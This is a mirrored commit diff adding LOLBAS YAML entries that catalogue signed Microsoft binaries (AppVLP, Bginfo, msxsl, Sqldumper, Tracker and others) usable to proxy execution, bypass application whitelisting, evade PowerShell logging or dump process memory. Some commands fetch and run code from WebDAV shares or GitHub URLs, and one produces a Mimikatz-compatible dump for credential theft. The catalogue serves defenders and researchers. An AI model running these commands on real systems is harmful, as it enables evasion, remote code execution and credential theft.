mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 23:05:58 +02:00 
			
		
		
		
	MD files generate from Script, and adjustments to readme
This commit is contained in:
		
							
								
								
									
										22
									
								
								yml/OtherMSBinaries/Appvlp.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								yml/OtherMSBinaries/Appvlp.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| --- | ||||
| Name: Appvlp.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: AppVLP.exe \\webdav\calc.bat | ||||
|     Description: Executes calc.bat through AppVLP.exe | ||||
|   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" | ||||
|     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. | ||||
|   - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" | ||||
|     Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. | ||||
| Full Path: | ||||
|   - C:\Program Files\Microsoft Office\root\client\appvlp.exe | ||||
|   - C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://github.com/MoooKitty/Code-Execution | ||||
|   - https://twitter.com/moo_hax/status/892388990686347264 | ||||
| Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution) | ||||
							
								
								
									
										20
									
								
								yml/OtherMSBinaries/Bginfo.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								yml/OtherMSBinaries/Bginfo.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| --- | ||||
| Name: Bginfo.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: bginfo.exe bginfo.bgi /popup /nolicprompt | ||||
|     Description: Execute VBscript code that is referenced within the bginfo.bgi file. | ||||
|   - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt' | ||||
|     Description: Execute bginfo.exe from a WebDAV server. | ||||
|   - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt' | ||||
|     Description: This style of execution may not longer work due to patch. | ||||
| Full Path: | ||||
|   - No fixed path | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
							
								
								
									
										19
									
								
								yml/OtherMSBinaries/Cdb.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								yml/OtherMSBinaries/Cdb.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| --- | ||||
| Name: Cdb.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: cdb.exe -cf x64_calc.wds -o notepad.exe | ||||
|     Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. | ||||
| Full Path: | ||||
|   - C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe | ||||
|   - C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html | ||||
|   - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options | ||||
|   - https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda | ||||
| Notes: Thanks to Matt Graeber - @mattifestation | ||||
							
								
								
									
										18
									
								
								yml/OtherMSBinaries/Csi.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										18
									
								
								yml/OtherMSBinaries/Csi.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,18 @@ | ||||
| --- | ||||
| Name: csi.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: csi.exe file | ||||
|     Description: Use csi.exe to run unsigned C# code. | ||||
| Full Path: | ||||
|   - c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe | ||||
|   - c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/subTee/status/781208810723549188 | ||||
|   - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
							
								
								
									
										17
									
								
								yml/OtherMSBinaries/Dnx.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								yml/OtherMSBinaries/Dnx.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| Name: dnx.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: dnx.exe consoleapp | ||||
|     Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) | ||||
| Full Path: | ||||
|   - N/A | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/ | ||||
| Notes: Thanks to Matt Nelson - @enigma0x3 | ||||
|  | ||||
							
								
								
									
										17
									
								
								yml/OtherMSBinaries/Dxcap.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								yml/OtherMSBinaries/Dxcap.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| Name: Dxcap.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe | ||||
|     Description: Launch notepad as a subprocess of Dxcap.exe | ||||
| Full Path: | ||||
|   - c:\Windows\System32\dxcap.exe | ||||
|   - c:\Windows\SysWOW64\dxcap.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/harr0ey/status/992008180904419328 | ||||
| Notes: Thanks to Matt harr0ey - @harr0ey | ||||
							
								
								
									
										21
									
								
								yml/OtherMSBinaries/Mftrace.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								yml/OtherMSBinaries/Mftrace.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| --- | ||||
| Name: Mftrace.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Mftrace.exe cmd.exe | ||||
|     Description: Launch cmd.exe as a subprocess of Mftrace.exe. | ||||
|   - Command: Mftrace.exe powershell.exe | ||||
|     Description: Launch cmd.exe as a subprocess of Mftrace.exe. | ||||
| Full Path: | ||||
|   - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86 | ||||
|   - C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64 | ||||
|   - C:\Program Files (x86)\Windows Kits\10\bin\x86 | ||||
|   - C:\Program Files (x86)\Windows Kits\10\bin\x64 | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible) | ||||
| Notes: Thanks to fabrizio - @0rbz_ | ||||
							
								
								
									
										16
									
								
								yml/OtherMSBinaries/Msdeploy.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										16
									
								
								yml/OtherMSBinaries/Msdeploy.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,16 @@ | ||||
| --- | ||||
| Name: Msdeploy.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" | ||||
|     Description: Launch calc.bat via msdeploy.exe. | ||||
| Full Path: | ||||
|   - C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/995837734379032576 | ||||
| Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
							
								
								
									
										19
									
								
								yml/OtherMSBinaries/Msxsl.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								yml/OtherMSBinaries/Msxsl.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| --- | ||||
| Name: msxsl.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: msxsl.exe customers.xml script.xsl | ||||
|     Description: Run COM Scriptlet code within the script.xsl file (local). | ||||
|   - Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml | ||||
|     Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). | ||||
| Full Path: | ||||
|   - N/A | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/subTee/status/877616321747271680 | ||||
|   - https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker | ||||
| Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote) | ||||
							
								
								
									
										15
									
								
								yml/OtherMSBinaries/Rcsi.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										15
									
								
								yml/OtherMSBinaries/Rcsi.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,15 @@ | ||||
| --- | ||||
| Name: rcsi.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: rcsi.exe bypass.csx | ||||
|     Description: Use embedded C# within the csx script to execute the code. | ||||
| Full Path: '' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ | ||||
| Notes: Thanks to Matt Nelson - @enigma0x3 | ||||
							
								
								
									
										21
									
								
								yml/OtherMSBinaries/Sqldumper.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								yml/OtherMSBinaries/Sqldumper.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| --- | ||||
| Name: Sqldumper.exe | ||||
| Description: Dump process | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: sqldumper.exe 464 0 0x0110 | ||||
|     Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). | ||||
|   - Command: sqldumper.exe 540 0 0x01100:40 | ||||
|     Description: 0x01100:40 flag will create a Mimikatz compatibile dump file. | ||||
| Full Path: | ||||
|   - C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe | ||||
|   - C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/countuponsec/status/910969424215232518 | ||||
|   - https://twitter.com/countuponsec/status/910977826853068800 | ||||
|   - https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se | ||||
| Notes: Thanks to Luis Rocha - @countuponsec | ||||
							
								
								
									
										16
									
								
								yml/OtherMSBinaries/Sqlps.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										16
									
								
								yml/OtherMSBinaries/Sqlps.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,16 @@ | ||||
| --- | ||||
| Name: Sqlps.exe | ||||
| Description: Execute, evade logging | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Sqlps.exe -noprofile | ||||
|     Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging. | ||||
| Full Path: | ||||
|   - C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/bryon_/status/975835709587075072 | ||||
| Notes: Thanks to Bryon - @bryon_ | ||||
							
								
								
									
										16
									
								
								yml/OtherMSBinaries/Sqltoolsps.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										16
									
								
								yml/OtherMSBinaries/Sqltoolsps.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,16 @@ | ||||
| --- | ||||
| Name: SQLToolsPS.exe | ||||
| Description: Execute, evade logging | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe | ||||
|     Description: Run PowerShell scripts and commands. | ||||
| Full Path: | ||||
|   - C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/993298228840992768 | ||||
| Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
							
								
								
									
										15
									
								
								yml/OtherMSBinaries/Te.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										15
									
								
								yml/OtherMSBinaries/Te.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,15 @@ | ||||
| --- | ||||
| Name: te.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: te.exe bypass.wsc | ||||
|     Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. | ||||
| Full Path: '' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg | ||||
| Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s | ||||
							
								
								
									
										17
									
								
								yml/OtherMSBinaries/Tracker.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								yml/OtherMSBinaries/Tracker.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| Name: Tracker.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe | ||||
|     Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. | ||||
| Full Path: '' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/subTee/status/793151392185589760 | ||||
|   - https://attack.mitre.org/wiki/Execution | ||||
|  | ||||
| Notes: Thanks to Casey Smith - @subTee | ||||
							
								
								
									
										16
									
								
								yml/OtherMSBinaries/Vsjitdebugger.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										16
									
								
								yml/OtherMSBinaries/Vsjitdebugger.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,16 @@ | ||||
| --- | ||||
| Name: vsjitdebugger.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Vsjitdebugger.exe calc.exe | ||||
|     Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe. | ||||
| Full Path: | ||||
|   - c:\windows\system32\vsjitdebugger.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/pabraeken/status/990758590020452353 | ||||
| Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken | ||||
							
								
								
									
										17
									
								
								yml/OtherMSBinaries/Winword.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								yml/OtherMSBinaries/Winword.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| --- | ||||
| Name: winword.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: winword.exe /l dllfile.dll | ||||
|     Description: Launch DLL payload. | ||||
| Full Path: | ||||
|   - c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
| Resources: | ||||
|   - https://twitter.com/vysecurity/status/884755482707210241 | ||||
|   - https://twitter.com/Hexacorn/status/885258886428725250 | ||||
| Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals) | ||||
		Reference in New Issue
	
	Block a user